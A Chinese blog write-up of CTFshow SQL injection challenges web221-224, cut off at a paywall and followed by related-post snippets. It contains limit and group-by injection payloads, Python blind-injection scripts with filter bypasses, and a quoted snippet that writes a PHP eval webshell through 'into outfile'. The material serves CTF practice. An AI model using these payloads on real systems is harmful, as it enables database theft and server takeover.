CTFshow sql注入 上篇(web221-253)

CTF挑战:SQL注入详解
原创 已于 2022-06-18 20:09:25 修改 · 5k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #sql

于 2022-04-20 18:00:29 首次发布
这篇博客详细介绍了CTF比赛中的多个SQL注入题目,包括limit注入、group by注入、堆叠注入、update注入和insert注入等。作者通过实例解析了解题思路,涉及MySQL的各种注入技巧,如盲注、预编译、union重命名法和比较法盲注等,并给出了不同过滤条件下的绕过策略。 
`

目录

前言

开始下半部分

题目

web221(limit注入)

做之前,可以先看一下p神的博客,有讲关于limit注入的,版本限制(5.0.0-5.6.6)

https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html

补充以下:

这里分两种情况,limit前面有无order by,有order by可以用union联合查询的

SELECT * from user LIMIT 1,1 union select * from user

20220411131449
题目用不了union,说明有order by

直接用p神的payload,数据库名就是flag

procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)

因为版本问题,select用不了,所以也不能查到更多信息

web222(group by注入)

看到有个去重,点击抓包

初步判断一下,可以用concat(if(1=1,"username",cot(0))),根据回显直接用盲注
在这里插入图片描述

# @Author:Kradress
import requests
import string

url = "http://12ee4415-b331-421c-b9d4-a077a8e155fd.challenge.ctf.show/api/"

result = ''
dict=string.ascii_lowercase+string.digits+"_-}{"

# 爆表名  
# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 爆列名
# payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flaga'"
#爆字段值
payload = "select flagaabc from ctfshow_flaga"

for i in range(1,46):
    print(i)
    for j in dict:
        s = f"?u=concat(if(substr(({
     
     payload}),{
     
     i},1)='{
     
     j}',username,cot(0)))#"
        r = requests.get(url+s)
        if("ctfshow" in r.text):
            result +=j
            print(result)
            break

web223(group by注入)

对数字进行了过滤

# @Author:Kradress
import requests
import string

url = "http://7702b56c-35d9-4b80-abdc-bb0956f4bce5.challenge.ctf.show/api/"

result = ''
dict=string.ascii_lowercase+string.digits+"_-,}{"

# 爆表名  
# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 爆列名
# payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'"
#爆字段值
payload = "select flagasabc from ctfshow_flagas"

def numToStr(str):
    parts = []
    for s in str:
        parts.append(numToStr2(s))
    res = ','.join(parts)
    return f"concat({
     
     res})"

def numToStr2(num):
    parts = []
    n = ord(num)
    for i in range(n):
        parts.append("true")
    res = "+".join(parts)
    return f"char({
     
     res})"

for i in range(1,46):
    print(i)
    for j in dict:
        params={
   
   
            'u' : f"concat(if(substr(({
     
     payload}),{
     
     numToStr(str(i))},true)={
     
     numToStr(j)},username,cot(false)))#"
        }
        r = requests.get(url, params=params)
        # print(r.url)
        if("ctfshow" in r.text):
            result +=j
            print(result)
            break

web224(文件名注入)

登陆页面试了半天进不去,后面发现有个robot.txt,里面有个重置密码页面

成功进了后台,发现是一个文件上传点,但经过测试,只能上传zip

在这里插入图片描述

没什么思路,群里有个payload.bin可以上传,访问1.php可以getshell
(y1ng师傅也有详细讲解)

https://blog.gem-love.com/ctf/2283.html#%E4%B

最低0.47元/天 解锁文章
ctfshow-sql注入
m0_72898152的博客
03-07 1049
ctf,sql注入
ctfshow web入门 SQl注入web171--web179
2301_81040377的博客
04-18 678
就能一次性查出25和26的,如果25存在就直接输出flag了,不然的话26存在也行。反正这种盲注问题用脚本就行了学的话看一下这篇文章。过滤了很简单的,当然是select啦,大小写绕过。还用用脚本注入的,但是我还没有成功过所以就…时间盲注,参考下面的文章,还是脚本做。,9999不存在时会查询id=3。我不知道怎么整的,看出是布尔盲注。进行猜测表格的id只有24个。没反应没事我们直接访问试试。是网站文件默认存放位置。本地测试,查询id为。还是base64解码。
ctfshow——SQL注入
qq_55202378的博客
04-30 2022
前者恒为真,如果and前面的语句有内容,则正常输出;后者恒为假,如果and前面的语句有内容,也不会输出。故,可以通过他们俩来判断SQL注入类型。查看页面源代码,发现一个js文件。访问该文件,会发现一个查询接口。一种方法是抓取数据包,让sqlmap跑数据包;不知道为啥这里%0c没有被过滤。的时候,需要使前面一条语句错误。伪造referer。这一关开始使用sqlmap。进行报错注入的时候,需要对。(+的url编码)替换。指定 sqlmap 以。参数指定要测试的网址,
CTSHOW-web入门-sql注入web221-web240)
最新发布
JL20050725的博客
08-26 996
本题告诉我们将or与单引号’给过滤了,十分不幸我们的information_schema中包含or这个单词,并且尝试双写,大小写,或者十六进制编码都无法绕过。由于我们想拿到flagas字段的值是要查ctfshow_flagasa表,然而题目中给出的sql语句是查ctfshow_web表的。0x7e,即 ‘~’ ,extractvalue 只有两个参数,它的第二个参数都要求是符合 xpath 语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里,‘~’ 不是 xml 实体,所以会报错。
CTFSHOW-sql注入
Yb_140的博客
08-13 2836
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctfshow--sql注入
qq_74240553的博客
03-02 1370
ctfshow--sql
WEB ---- ctfshow ----- SQL注入
L0g1c的博客
06-24 521
看题目 //拼接sql语句查找指定ID用户我们能够控制的只有的值,经分析,条件为不为 flag。可是只有用户名为 flag 才能输出 正确的flag。第一步先判断是否有注入点。观察到存在单引号,所以要考虑引号闭合问题。 输入的内容被当作代码执行 逻辑词 or 只要任意一个条件为真就算成立所以输入,可以列出所有的记录(数据)本来抱着测试注入点,不小心把 flag 测出来了,嘻嘻。正规做一下这个题,要想绕过 ,仔细观察得到与 id 使用逻辑运算符 相连,所以使得 id 与一个不存在的数相等,就可以绕过 打开题
ctfshow sql注入 web234--web241
2301_81040377的博客
07-03 505
如果说为什么要在insert.php进行注入的话,我不知道你注意前面的注入没有都是在相应的php页面进行的。回来刷新就有flag了,我调了一会笑死了,之前的脚本居然没起到注入的作用然后又在那里慢慢调。这个脚本我写了很久,因为我之前并没有完全理解try,except,现在懂了。api是一个url的接口,所以我们在这里实现注入。这里我们直接闭合username然后就行。过滤之后,我们还有另外两个能够使用的库。看到页面没有注入的地方我们访问api。脚本还是比较简单的我就不解释了。被过滤了,所以我们用。
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7635
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
ctfshow web sql注入 web242--web249
2301_81040377的博客
07-03 640
mid和limit都行,我比较喜欢用mid。用这两个替换floor这个向下取整函数。into outfile 的使用。用.user.ini包含。
ctfshow_sql注入
qq_45951598的博客
03-14 2214
文章目录WEB172WEB173 WEB172 查询语句 //拼接sql语句查找指定ID用户 sql = “select username,password from ctfshow_user2 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;"; 返回逻辑 //检查结果是否有flag if($row->username!==‘flag’){ $ret[‘msg’]=‘查询成功’; } 这里说我们返回的语句中不能包含flag
ctf.show的SQL注入(web171-web253)
热门推荐
wanan的博客
09-30 1万+
ctf.show的SQL注入(web171-web253)
CTFshow——SQL注入【Part 1】
D.MIND 的博客
03-10 1020
web171—— 2' and 1=1 # 2' or 1=1 # 数据接口请求异常:parsererror 2' or 1=1 -- - 回显正常,且爆出所有信息,说明“-- -”其效果了 。“#”这种注释方式不成功 2' union select 1,2 -- - 数据接口请求异常:parsererror 2' union select 1,2,3 -- - 成功回显1,2,3 2' union select 1,database(),group_concat(table_name) fro
CTFSHOW SQL注入篇(171-190)
羽的博客
06-07 3050
无过滤 前言 下面几道无过滤的题都可以写入shell 然后蚁剑连上后从数据库里面找,具体做法如下 id=0' union select 1,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 有的是查询的三项所以payload是 id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 接着
CTFSHOW SQL注入篇(231-253
羽的博客
06-11 2078
CTFSHOW SQL注入
CTFSHOW SQL注入篇(191-210)
羽的博客
06-07 1491
ctfshow sql
CTFSHOW SQL注入篇(211-230)
羽的博客
06-09 1957
ctfshow SQL注入
ctfshow sql注入
weixin_56537388的博客
08-17 176
可以看出有3个字段,采用联合查询的方式,查找数据库,%23代表#号MariaDB是MySQL的分支使用group_concat可以输出多个结果,这里因为只有一个结果,mysql5.0以上的版本有information_schema,可以省下拆解的过程这里跑出列名这里跑出数据,flag为ctfshow{dc5b040b-cb74-479c-9b2f-a6a4e2b84c0f}
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 1359
重新来做一遍 争取不看wp。
ctfshow web web3
02-14
### 关于CTFShow Web安全挑战与Web3教程 #### CTFShow平台概述 CTFShow作为一个专注于网络安全领域的“Capture The Flag”(夺旗赛)展示工具或平台,提供了丰富的资源供爱好者们学习和实践。该平台不仅涵盖了多种类型的网络攻防技术,而且特别强调了实际操作能力的培养[^1]。 #### Web安全挑战特点 针对Web类别的挑战项目,在CTFShow上有着详细的分类和支持材料。这些挑战旨在模拟真实世界中存在的各种Web应用漏洞场景,让参赛者能够深入理解诸如SQL注入、XSS跨站脚本攻击等常见威胁的工作原理及其防御措施。对于想要提升自己在Web开发安全性方面技能的人来说是非常有价值的练习机会[^2]。 #### 特定于Web3的安全考量 随着区块链技术和去中心化应用程序(DApps)的发展,基于以太坊智能合约构建的应用程序逐渐成为新的关注焦点之一——即所谓的Web3概念。这类新型互联网架构带来了独特的安全风险因素,比如Solidity语言特性所引发的功能逻辑错误或是Gas优化不当等问题。因此,在参与涉及Web3部分的比赛之前,建议先掌握以下几个方面的基础知识: - **智能合约编程基础**:熟悉Ethereum虚拟机(EVM),了解如何编写简单的ERC标准代币合同。 - **常见的智能合约漏洞模式识别**:如重入(reentrancy), 整数溢出(integer overflow/underflow) 和短地址攻击(short address attack)[^3]. - **测试框架使用方法**: 学会运用Truffle/Ganache这样的本地部署环境来进行单元测试, 并且可以考虑采用Mythril之类的静态分析工具来辅助检测潜在的风险点. 为了更好地准备有关Web3方向上的比赛题目,推荐参考官方文档以及活跃的技术论坛,持续跟踪最新发布的案例研究和技术文章,从而保持对该领域前沿动态的理解。 ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; contract SimpleStorage { uint storedData; function set(uint x) public { storedData = x; // 设置存储的数据 } function get() view public returns (uint){ return storedData; // 获取当前存储的数据 } } ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值